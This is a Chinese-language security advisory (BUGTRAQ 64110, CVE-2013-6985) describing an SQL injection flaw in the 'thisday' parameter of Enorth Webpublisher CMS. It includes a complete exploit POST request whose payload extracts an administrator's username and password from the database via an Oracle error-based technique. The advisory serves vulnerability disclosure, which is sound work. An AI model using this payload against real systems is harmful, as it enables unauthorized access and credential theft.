Enorth Webpublisher CMS \'thisday\'参数SQL注入漏洞
信息来源:xin.wang 发表日期:2013-03-15 15:58:00
Enorth Webpublisher是网络媒体内容管理、发布平台。
Enorth Webpublisher在\'thisday\'参数的实现上存在安全漏洞,成功利用后可使攻击者破坏应用、访问或修改数据、利用下层数据库内的其他漏洞。
BUGTRAQ-ID:64110
CVE-ID:2013-6985
受影响系统:
enorth Webpublisher CMS
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!POST /pub/m_worklog/log_searchday.jsp HTTP/1.1
Host: www.example.com
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Cookie:
Pragma: no-cache
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
thisday=20131012\') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype=
解决办法:
厂商补丁:
enorth
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://webpublisher.enorth.com.cn/